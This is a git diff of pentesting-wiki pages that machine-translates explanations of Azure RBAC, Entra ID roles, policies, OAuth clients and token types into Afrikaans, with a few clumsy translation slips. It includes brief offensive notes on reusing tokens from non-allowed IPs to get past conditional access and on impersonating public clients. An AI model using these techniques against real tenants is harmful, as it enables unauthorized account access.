+Administratiewe eenhede laat toe om **toestemmings van 'n rol oor 'n spesifieke gedeelte van 'n organisasie te gee**. -Example: +Voorbeeld: -- Scenario: A company wants regional IT admins to manage only the users in their own region. -- Implementation: - - Create Administrative Units for each region (e.g., "North America AU", "Europe AU"). - - Populate AUs with users from their respective regions. - - AUs can **contain users, groups, or devices** - - AUs support **dynamic memberships** - - AUs **cannot contain AUs** - - Assign Admin Roles: - - Grant the "User Administrator" role to regional IT staff, scoped to their region's AU. -- Outcome: Regional IT admins can manage user accounts within their region without affecting other regions. +- Scenario: 'n Maatskappy wil regionale IT admins toelaat om slegs die gebruikers in hul eie streek te bestuur. +- Implementering: +- Skep Administratiewe Eenhede vir elke streek (bv., "Noord-Amerika AU", "Europa AU"). +- Vul AU's met gebruikers uit hul onderskeie streke. +- AU's kan **gebruikers, groepe, of toestelle** bevat +- AU's ondersteun **dinamiese lidmaatskappe** +- AU's **kan nie AU's bevat nie** +- Ken Admin Rolle toe: +- Gee die "Gebruiker Administrateur" rol aan regionale IT personeel, geskaal na hul streek se AU. +- Uitkoms: Regionale IT admins kan gebruikersrekeninge binne hul streek bestuur sonder om ander streke te beĂŻnvloed. 
-### Entra ID Roles +### Entra ID Rolle -- In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID - - Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference) -- The most privileged role is **Global Administrator** -- In the Description of the role it’s possible to see its **granular permissions** +- Ten einde Entra ID te bestuur, is daar 'n paar **ingeboude rolle** wat aan Entra ID prinsipale toegeken kan word om Entra ID te bestuur +- Kyk na die rolle in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference) +- Die mees bevoorregte rol is **Globale Administrateur** +- In die Beskrywing van die rol is dit moontlik om sy **fynere toestemmings** te sien -## Roles & Permissions +## Rolle & Toestemmings -**Roles** are **assigned** to **principals** on a **scope**: `principal -[HAS ROLE]->(scope)` +**Rolle** word **toegeken** aan **prinsipale** op 'n **skaal**: `prinsipaal -[HEE ROLE]->(skaal)` -**Roles** assigned to **groups** are **inherited** by all the **members** of the group. +**Rolle** wat aan **groepe** toegeken word, word **geĂ«rf** deur al die **lede** van die groep. -Depending on the scope the role was assigned to, the **role** cold be **inherited** to **other resources** inside the scope container. For example, if a user A has a **role on the subscription**, he will have that **role on all the resource groups** inside the subscription and on **all the resources** inside the resource group. +Afhangende van die skaal waaraan die rol toegeken is, kan die **rol** **geĂ«rf** word na **ander hulpbronne** binne die skaal houer. 
Byvoorbeeld, as 'n gebruiker A 'n **rol op die subskripsie** het, sal hy daardie **rol op al die hulpbron groepe** binne die subskripsie hĂȘ en op **al die hulpbronne** binne die hulpbron groep. -### **Classic Roles** +### **Klassieke Rolle** -| **Owner** |
  • Full access to all resources
  • Can manage access for other users
| All resource types | -| ----------------------------- | ---------------------------------------------------------------------------------------- | ------------------ | -| **Contributor** |
  • Full access to all resources
  • Cannot manage access
| All resource types | -| **Reader** | ‱ View all resources | All resource types | -| **User Access Administrator** |
  • View all resources
  • Can manage access for other users
| All resource types | +| **Eienaar** |
  • Volledige toegang tot alle hulpbronne
  • Kan toegang vir ander gebruikers bestuur
| Alle hulpbron tipes | +| ------------------------------- | ---------------------------------------------------------------------------------------- | ------------------ | +| **Bydraer** |
  • Volledige toegang tot alle hulpbronne
  • Kan nie toegang bestuur nie
| Alle hulpbron tipes | +| **Leser** | ‱ Sien alle hulpbronne | Alle hulpbron tipes | +| **Gebruiker Toegang Administrateur** |
  • Sien alle hulpbronne
  • Kan toegang vir ander gebruikers bestuur
| Alle hulpbron tipes | -### Built-In roles +### Gebou-in rolle -[From the docs: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure role-based access control (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) has several Azure **built-in roles** that you can **assign** to **users, groups, service principals, and managed identities**. Role assignments are the way you control **access to Azure resources**. If the built-in roles don't meet the specific needs of your organization, you can create your own [**Azure custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.** +[Van die dokumentasie: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure rol-gebaseerde toegangbeheer (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) het verskeie Azure **gebou-in rolle** wat jy kan **toeken** aan **gebruikers, groepe, diens prinsipale, en bestuurde identiteite**. Rol toekennings is die manier waarop jy **toegang tot Azure hulpbronne** beheer. As die gebou-in rolle nie aan die spesifieke behoeftes van jou organisasie voldoen nie, kan jy jou eie [**Azure pasgemaakte rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.** -**Built-In** roles apply only to the **resources** they are **meant** to, for example check this 2 examples of **Built-In roles over Compute** resources: +**Gebou-in** rolle geld slegs vir die **hulpbronne** waarvoor hulle **bedoel** is, byvoorbeeld kyk na hierdie 2 voorbeelde van **Gebou-in rolle oor Compute** hulpbronne: -| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Provides permission to backup vault to perform disk backup. 
| 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 | +| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Bied toestemming aan om rugsteun kluise te gebruik om disk rugsteun te doen. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 | | ----------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ------------------------------------ | -| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | View Virtual Machines in the portal and login as a regular user. | fb879df8-f326-4884-b1cf-06f3ad86be52 | +| [Virtuele Masjien Gebruiker Aanmelding](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | Sien Virtuele Masjiene in die portaal en meld aan as 'n gewone gebruiker. | fb879df8-f326-4884-b1cf-06f3ad86be52 | -This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**. +Hierdie rolle kan **ook toegeken word oor logiese houers** (soos bestuursgroepe, subskripsies en hulpbron groepe) en die prinsipale wat geraak word, sal dit **oor die hulpbronne binne daardie houers** hĂȘ. -- Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles). -- Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference). +- Vind hier 'n lys met [**alle Azure gebou-in rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles). 
+- Vind hier 'n lys met [**alle Entra ID gebou-in rolle**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference). -### Custom Roles +### Pasgemaakte Rolle -- It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) -- They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups) -- It’s possible to configure all the granular permissions the custom role will have -- It’s possible to exclude permissions - - A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere -- It’s possible to use wildcards -- The used format is a JSON - - `actions` are for control actions over the resource - - `dataActions` are permissions over the data within the object - -Example of permissions JSON for a custom role: +- Dit is ook moontlik om [**pasgemaakte rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) te skep +- Hulle word binne 'n skaal geskep, alhoewel 'n rol in verskeie skale kan wees (bestuursgroepe, subskripsie en hulpbron groepe) +- Dit is moontlik om al die fynere toestemmings wat die pasgemaakte rol sal hĂȘ, te konfigureer +- Dit is moontlik om toestemmings uit te sluit +- 'n prinsipaal met 'n uitgeslote toestemming sal dit nie kan gebruik nie, selfs al word die toestemming elders toegeken +- Dit is moontlik om wildcard te gebruik +- Die gebruikte formaat is 'n JSON +- `actions` is vir beheer aksies oor die hulpbron +- `dataActions` is toestemmings oor die data binne die objek +Voorbeeld van toestemmings JSON vir 'n pasgemaakte rol: ```json { - "properties": { - "roleName": "", - "description": "", - "assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"], - "permissions": [ - { - "actions": [ - "Microsoft.DigitalTwins/register/action", - "Microsoft.DigitalTwins/unregister/action", - 
"Microsoft.DigitalTwins/operations/read", - "Microsoft.DigitalTwins/digitalTwinsInstances/read", - "Microsoft.DigitalTwins/digitalTwinsInstances/write", - "Microsoft.CostManagement/exports/*" - ], - "notActions": [ - "Astronomer.Astro/register/action", - "Astronomer.Astro/unregister/action", - "Astronomer.Astro/operations/read", - "Astronomer.Astro/organizations/read" - ], - "dataActions": [], - "notDataActions": [] - } - ] - } +"properties": { +"roleName": "", +"description": "", +"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"], +"permissions": [ +{ +"actions": [ +"Microsoft.DigitalTwins/register/action", +"Microsoft.DigitalTwins/unregister/action", +"Microsoft.DigitalTwins/operations/read", +"Microsoft.DigitalTwins/digitalTwinsInstances/read", +"Microsoft.DigitalTwins/digitalTwinsInstances/write", +"Microsoft.CostManagement/exports/*" +], +"notActions": [ +"Astronomer.Astro/register/action", +"Astronomer.Astro/unregister/action", +"Astronomer.Astro/operations/read", +"Astronomer.Astro/organizations/read" +], +"dataActions": [], +"notDataActions": [] +} +] +} } ``` +### Permissies volgorde -### Permissions order - -- In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**. -- An explicit **deny role assignment takes precedence** over the role granting the permission. +- Ten einde vir 'n **hoofpersoon om toegang tot 'n hulpbron te hĂȘ** moet daar 'n eksplisiete rol aan hom toegeken word (op enige manier) **wat hom daardie toestemming gee**. +- 'n Eksplisiete **weier roltoewysing het voorrang** bo die rol wat die toestemming gee.

https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10

-### Global Administrator +### Globale Administrateur -Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default. +Globale Administrateur is 'n rol van Entra ID wat **volledige beheer oor die Entra ID huurder gee**. Dit gee egter nie standaard enige toestemmings oor Azure hulpbronne nie. -Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\ -This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties) +Gebruikers met die Globale Administrateur rol het die vermoë om '**te verhoog' na die Gebruikerstoegang Administrateur Azure rol in die Wortelbestuursgroep**. So kan Globale Administrateurs toegang in **alle Azure subskripsies en bestuursgroepe bestuur.**\ +Hierdie verhoging kan aan die einde van die bladsy gedoen word: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
-### Azure Policies +### Azure Beleide -**Azure Policies** are rules that help organizations ensure their resources meet specific standards and compliance requirements. They allow you to **enforce or audit settings on resources in Azure**. For example, you can prevent the creation of virtual machines in an unauthorized region or ensure that all resources have specific tags for tracking. +**Azure Beleide** is reĂ«ls wat organisasies help om te verseker dat hul hulpbronne aan spesifieke standaarde en nakomingsvereistes voldoen. Hulle stel jou in staat om **instellings op hulpbronne in Azure af te dwing of te oudit**. Byvoorbeeld, jy kan die skepping van virtuele masjiene in 'n nie-geautoriseerde streek voorkom of verseker dat alle hulpbronne spesifieke etikette het vir opsporing. -Azure Policies are **proactive**: they can stop non-compliant resources from being created or changed. They are also **reactive**, allowing you to find and fix existing non-compliant resources. +Azure Beleide is **proaktief**: hulle kan nie-nakomende hulpbronne stop om geskep of verander te word. Hulle is ook **reaktief**, wat jou toelaat om bestaande nie-nakomende hulpbronne te vind en reg te stel. -#### **Key Concepts** +#### **Belangrike Konsepte** -1. **Policy Definition**: A rule, written in JSON, that specifies what is allowed or required. -2. **Policy Assignment**: The application of a policy to a specific scope (e.g., subscription, resource group). -3. **Initiatives**: A collection of policies grouped together for broader enforcement. -4. **Effect**: Specifies what happens when the policy is triggered (e.g., "Deny," "Audit," or "Append"). +1. **Beleid Definisie**: 'n ReĂ«l, geskryf in JSON, wat spesifiseer wat toegelaat of vereis word. +2. **Beleid Toewysing**: Die toepassing van 'n beleid op 'n spesifieke omvang (bv. subskripsie, hulpbron groep). +3. **Inisiatiewe**: 'n Versameling van beleide wat saamgegroepeer is vir breĂ«r afdwinging. +4. 
**Effek**: Spesifiseer wat gebeur wanneer die beleid geaktiveer word (bv. "Weier," "Oudit," of "Voeg by"). -**Some examples:** +**Sommige voorbeelde:** -1. **Ensuring Compliance with Specific Azure Regions**: This policy ensures that all resources are deployed in specific Azure regions. For example, a company might want to ensure all its data is stored in Europe for GDPR compliance. -2. **Enforcing Naming Standards**: Policies can enforce naming conventions for Azure resources. This helps in organizing and easily identifying resources based on their names, which is helpful in large environments. -3. **Restricting Certain Resource Types**: This policy can restrict the creation of certain types of resources. For example, a policy could be set to prevent the creation of expensive resource types, like certain VM sizes, to control costs. -4. **Enforcing Tagging Policies**: Tags are key-value pairs associated with Azure resources used for resource management. Policies can enforce that certain tags must be present, or have specific values, for all resources. This is useful for cost tracking, ownership, or categorization of resources. -5. **Limiting Public Access to Resources**: Policies can enforce that certain resources, like storage accounts or databases, do not have public endpoints, ensuring that they are only accessible within the organization's network. -6. **Automatically Applying Security Settings**: Policies can be used to automatically apply security settings to resources, such as applying a specific network security group to all VMs or ensuring that all storage accounts use encryption. +1. **Verseker Nakoming met Spesifieke Azure Streke**: Hierdie beleid verseker dat alle hulpbronne in spesifieke Azure streke ontplooi word. Byvoorbeeld, 'n maatskappy mag wil verseker dat al sy data in Europa gestoor word vir GDPR-nakoming. +2. **Afgedwonge Naamstandaarde**: Beleide kan naamkonvensies vir Azure hulpbronne afdwing. 
Dit help om hulpbronne te organiseer en maklik te identifiseer op grond van hul name, wat nuttig is in groot omgewings. +3. **Beperking van Sekere Hulpbron Tipes**: Hierdie beleid kan die skepping van sekere tipes hulpbronne beperk. Byvoorbeeld, 'n beleid kan ingestel word om die skepping van duur hulpbron tipes, soos sekere VM-groottes, te voorkom om koste te beheer. +4. **Afgedwonge Etikettering Beleide**: Etikette is sleutel-waarde pare wat met Azure hulpbronne geassosieer word en gebruik word vir hulpbronbestuur. Beleide kan afdwing dat sekere etikette teenwoordig moet wees, of spesifieke waardes moet hĂȘ, vir alle hulpbronne. Dit is nuttig vir kostesporing, eienaarskap, of kategorisering van hulpbronne. +5. **Beperking van Publieke Toegang tot Hulpbronne**: Beleide kan afdwing dat sekere hulpbronne, soos stoor rekeninge of databasisse, nie publieke eindpunte het nie, wat verseker dat hulle slegs binne die organisasie se netwerk toeganklik is. +6. **Outomatiese Toepassing van Sekuriteitsinstellings**: Beleide kan gebruik word om outomaties sekuriteitsinstellings op hulpbronne toe te pas, soos om 'n spesifieke netwerk sekuriteitsgroep op alle VM's toe te pas of te verseker dat alle stoor rekeninge versleuteling gebruik. -Note that Azure Policies can be attached to any level of the Azure hierarchy, but they are **commonly used in the root management group** or in other management groups. - -Azure policy json example: +Let daarop dat Azure Beleide aan enige vlak van die Azure hiĂ«rargie geheg kan word, maar hulle word **gewoonlik in die wortelbestuursgroep** of in ander bestuursgroepe gebruik. 
+Azure beleid json voorbeeld: ```json { - "policyRule": { - "if": { - "field": "location", - "notIn": ["eastus", "westus"] - }, - "then": { - "effect": "Deny" - } - }, - "parameters": {}, - "displayName": "Allow resources only in East US and West US", - "description": "This policy ensures that resources can only be created in East US or West US.", - "mode": "All" +"policyRule": { +"if": { +"field": "location", +"notIn": ["eastus", "westus"] +}, +"then": { +"effect": "Deny" +} +}, +"parameters": {}, +"displayName": "Allow resources only in East US and West US", +"description": "This policy ensures that resources can only be created in East US or West US.", +"mode": "All" } ``` +### Toestemmings Erf -### Permissions Inheritance +In Azure **kan toestemmings aan enige deel van die hiĂ«rargie toegeken word**. Dit sluit bestuursgroepe, subskripsies, hulpbron groepe, en individuele hulpbronne in. Toestemmings word **geĂ«rf** deur die ingeslote **hulpbronne** van die entiteit waar hulle toegeken is. -In Azure **permissions are can be assigned to any part of the hierarchy**. That includes management groups, subscriptions, resource groups, and individual resources. Permissions are **inherited** by contained **resources** of the entity where they were assigned. - -This hierarchical structure allows for efficient and scalable management of access permissions. +Hierdie hiĂ«rargiese struktuur stel doeltreffende en skaalbare bestuur van toegangstoestemmings in staat.
### Azure RBAC vs ABAC -**RBAC** (role-based access control) is what we have seen already in the previous sections: **Assigning a role to a principal to grant him access** over a resource.\ -However, in some cases you might want to provide **more fined-grained access management** or **simplify** the management of **hundreds** of role **assignments**. +**RBAC** (rol-gebaseerde toegangbeheer) is wat ons reeds in die vorige afdelings gesien het: **'n rol aan 'n prinsiep toe te ken om hom toegang te gee** oor 'n hulpbron.\ +E however, in sommige gevalle wil jy dalk **meer fyn-gegradeerde toegangsbewaking** of **vereenvoudig** die bestuur van **honderde** rol **toekennings**. -Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\ -You **cannot** explicitly **deny** **access** to specific resources **using conditions**. +Azure **ABAC** (attribuut-gebaseerde toegangbeheer) bou op Azure RBAC deur **roltoekenningsvoorwaardes gebaseer op attribuute** in die konteks van spesifieke aksies by te voeg. 'n _roltoekenningsvoorwaarde_ is 'n **addisionele kontrole wat jy opsioneel aan jou roltoekenning kan voeg** om meer fyn-gegradeerde toegangbeheer te bied. 'n Voorwaarde filter die toestemmings wat as deel van die roldefinisie en roltoekenning toegeken word. Byvoorbeeld, jy kan **'n voorwaarde byvoeg wat vereis dat 'n objek 'n spesifieke etiket moet hĂȘ om die objek te lees**.\ +Jy **kan nie** eksplisiet **toegang** tot spesifieke hulpbronne **weier nie** **met behulp van voorwaardes**. 
-## References +## Verwysings - [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview) - [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions) @@ -379,7 +375,3 @@ You **cannot** explicitly **deny** **access** to specific resources **using cond - [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md index d076e723a..16871b37d 100644 --- a/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md +++ b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md 
@@ -4,98 +4,97 @@ ## Basic Information -Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implements the OAuth 2.0 authorization framework and the OpenID Connect (OIDC) authentication protocol to manage access to resources. +Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implementeer die OAuth 2.0-autoriseringsraamwerk en die OpenID Connect (OIDC) autentikasieprotokol om toegang tot hulpbronne te bestuur. ### OAuth -**Key Participants in OAuth 2.0:** +**Belangrike Deelnemers in OAuth 2.0:** -1. **Resource Server (RS):** Protects resources owned by the resource owner. -2. **Resource Owner (RO):** Typically an end-user who owns the protected resources. -3. **Client Application (CA):** An application seeking access to resources on behalf of the resource owner. -4. **Authorization Server (AS):** Issues access tokens to client applications after authenticating and authorizing them. +1. **Hulpbronbediener (RS):** Beskerm hulpbronne wat deur die hulpbron eienaar besit word. +2. **Hulpbron Eienaar (RO):** Tipies 'n eindgebruiker wat die beskermde hulpbronne besit. +3. **KliĂ«nttoepassing (CA):** 'n Toepassing wat toegang tot hulpbronne soek namens die hulpbron eienaar. +4. **Autoriseringsbediener (AS):** Gee toegangstokens aan kliĂ«nttoepassings nadat dit hulle geverifieer en geautoriseer het. -**Scopes and Consent:** +**Skoppe en Toestemming:** -- **Scopes:** Granular permissions defined on the resource server that specify access levels. -- **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes. 
+- **Skoppe:** Fyn gespesifiseerde toestemmings op die hulpbronbediener wat toegangsvlakke spesifiseer. +- **Toestemming:** Die proses waardeur 'n hulpbron eienaar 'n kliĂ«nttoepassing toestemming gee om toegang tot hulpbronne met spesifieke skoppe te verkry. -**Microsoft 365 Integration:** +**Microsoft 365 Integrasie:** -- Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications. -- These applications are deeply integrated and often have interdependent service relationships. -- To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications. -- **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l. -- These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces. +- Microsoft 365 gebruik Azure AD vir IAM en bestaan uit verskeie "eerste-party" OAuth-toepassings. +- Hierdie toepassings is diep geĂŻntegreer en het dikwels onderling afhanklike diensverhoudings. +- Om die gebruikerservaring te vereenvoudig en funksionaliteit te handhaaf, gee Microsoft "implisiete toestemming" of "vooraf toestemming" aan hierdie eerste-party toepassings. +- **Implisiete Toestemming:** Sekere toepassings word outomaties **toegang tot spesifieke skoppe sonder eksplisiete gebruiker of administrateur goedkeuring gegee**. +- Hierdie vooraf goedgekeurde skoppe is tipies verborge vir beide gebruikers en administrateurs, wat dit minder sigbaar maak in standaard bestuursinterfaces. -**Client Application Types:** +**KliĂ«nttoepassing Tipes:** -1. **Confidential Clients:** - - Possess their own credentials (e.g., passwords or certificates). - - Can **securely authenticate themselves** to the authorization server. -2. **Public Clients:** - - Do not have unique credentials. 
- - Cannot securely authenticate to the authorization server. - - **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application. +1. **Vertroulike KliĂ«nte:** +- Besit hul eie geloofsbriewe (bv. wagwoorde of sertifikate). +- Kan **veilig hulself autentiseer** by die autoriseringsbediener. +2. **Publieke KliĂ«nte:** +- Het nie unieke geloofsbriewe nie. +- Kan nie veilig autentiseer by die autoriseringsbediener nie. +- **Sekuriteitsimplikasie:** 'n Aanvaller kan 'n publieke kliĂ«nttoepassing naboots wanneer hy tokens aan vra, aangesien daar geen meganisme is vir die autoriseringsbediener om die legitimiteit van die toepassing te verifieer nie. ## Authentication Tokens -There are **three types of tokens** used in OIDC: +Daar is **drie tipes tokens** wat in OIDC gebruik word: -- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default. -- **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**. -- **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens). - - A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. 
However, this is not the case with **FOCI applications tokens**. - - A refresh token is encrypted and only Microsoft can decrypt it. - - Getting a new refresh token doesn't revoke the previous refresh token. +- [**Toegangstokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** Die kliĂ«nt bied hierdie token aan die hulpbronbediener aan om **toegang tot hulpbronne** te verkry. Dit kan slegs gebruik word vir 'n spesifieke kombinasie van gebruiker, kliĂ«nt en hulpbron en **kan nie herroep word** tot vervaldatum nie - dit is 1 uur per standaard. +- **ID Tokens**: Die kliĂ«nt ontvang hierdie **token van die autoriseringsbediener**. Dit bevat basiese inligting oor die gebruiker. Dit is **gebind aan 'n spesifieke kombinasie van gebruiker en kliĂ«nt**. +- **Herfris Tokens**: Verskaf aan die kliĂ«nt saam met toegangstoken. Gebruik om **nuwe toegang en ID tokens te verkry**. Dit is gebind aan 'n spesifieke kombinasie van gebruiker en kliĂ«nt en kan herroep word. Standaard vervaldatum is **90 dae** vir inaktiewe herfris tokens en **geen vervaldatum vir aktiewe tokens** (dit is moontlik om nuwe herfris tokens van 'n herfris token te verkry). +- 'n Herfris token moet gekoppel wees aan 'n **`aud`**, aan sekere **skoppe**, en aan 'n **tenant** en dit moet slegs in staat wees om toegangstokens vir daardie aud, skoppe (en nie meer nie) en tenant te genereer. Dit is egter nie die geval met **FOCI toepassings tokens** nie. +- 'n Herfris token is versleuteld en slegs Microsoft kan dit ontsleutel. +- Om 'n nuwe herfris token te verkry, herroep nie die vorige herfris token nie. > [!WARNING] -> Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**. +> Inligting vir **voorwaardelike toegang** is **gestoor** binne die **JWT**. 
So, as jy die **token van 'n toegelate IP-adres** aan vra, sal daardie **IP** in die token **gestoor** word en dan kan jy daardie token van 'n **nie-toegelate IP gebruik om toegang tot die hulpbronne** te verkry. ### Access Tokens "aud" -The field indicated in the "aud" field is the **resource server** (the application) used to perform the login. +Die veld wat in die "aud" veld aangedui word, is die **hulpbronbediener** (die toepassing) wat gebruik word om die aanmelding uit te voer. -The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token: +Die opdrag `az account get-access-token --resource-type [...]` ondersteun die volgende tipes en elkeen van hulle sal 'n spesifieke "aud" in die resulterende toegangstoken voeg: > [!CAUTION] -> Note that the following are just the APIs supported by `az account get-access-token` but there are more. +> Let daarop dat die volgende net die API's is wat deur `az account get-access-token` ondersteun word, maar daar is meer.
-aud examples +aud voorbeelde -- **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD). - - `https://graph.windows.net/` +- **aad-graph (Azure Active Directory Graph API)**: Gebruik om toegang te verkry tot die ouer Azure AD Graph API (verouderd), wat toepassings toelaat om gidsdata in Azure Active Directory (Azure AD) te lees en te skryf. +- `https://graph.windows.net/` -* **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more. - - `https://management.core.windows.net/ or https://management.azure.com/` +* **arm (Azure Resource Manager)**: Gebruik om Azure hulpbronne te bestuur deur die Azure Resource Manager API. Dit sluit operasies in soos die skep, opdateer en verwyder van hulpbronne soos virtuele masjiene, stoor rekeninge, en meer. +- `https://management.core.windows.net/ of https://management.azure.com/` -- **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud. - - `https://batch.core.windows.net/` +- **batch (Azure Batch Services)**: Gebruik om toegang te verkry tot Azure Batch, 'n diens wat grootmaat parallelle en hoë-prestasie rekenaar toepassings doeltreffend in die wolk moontlik maak. +- `https://batch.core.windows.net/` -* **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service. - - `https://datalake.azure.net/` +* **data-lake (Azure Data Lake Storage)**: Gebruik om te kommunikeer met Azure Data Lake Storage Gen1, wat 'n skaalbare data berging en analise diens is. 
+- `https://datalake.azure.net/` -- **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content. - - `https://rest.media.azure.net` +- **media (Azure Media Services)**: Gebruik om toegang te verkry tot Azure Media Services, wat wolk-gebaseerde media verwerking en aflewering dienste vir video en klank inhoud bied. +- `https://rest.media.azure.net` -* **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services. - - `https://graph.microsoft.com` +* **ms-graph (Microsoft Graph API)**: Gebruik om toegang te verkry tot die Microsoft Graph API, die verenigde eindpunt vir Microsoft 365 dienste data. Dit laat jou toe om data en insigte van dienste soos Azure AD, Office 365, Enterprise Mobility, en Sekuriteitsdienste te verkry. +- `https://graph.microsoft.com` -- **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB. - - `https://ossrdbms-aad.database.windows.net` +- **oss-rdbms (Azure Open Source Relational Databases)**: Gebruik om toegang te verkry tot Azure Databasis dienste vir oopbron relationele databasis enjin soos MySQL, PostgreSQL, en MariaDB. +- `https://ossrdbms-aad.database.windows.net`
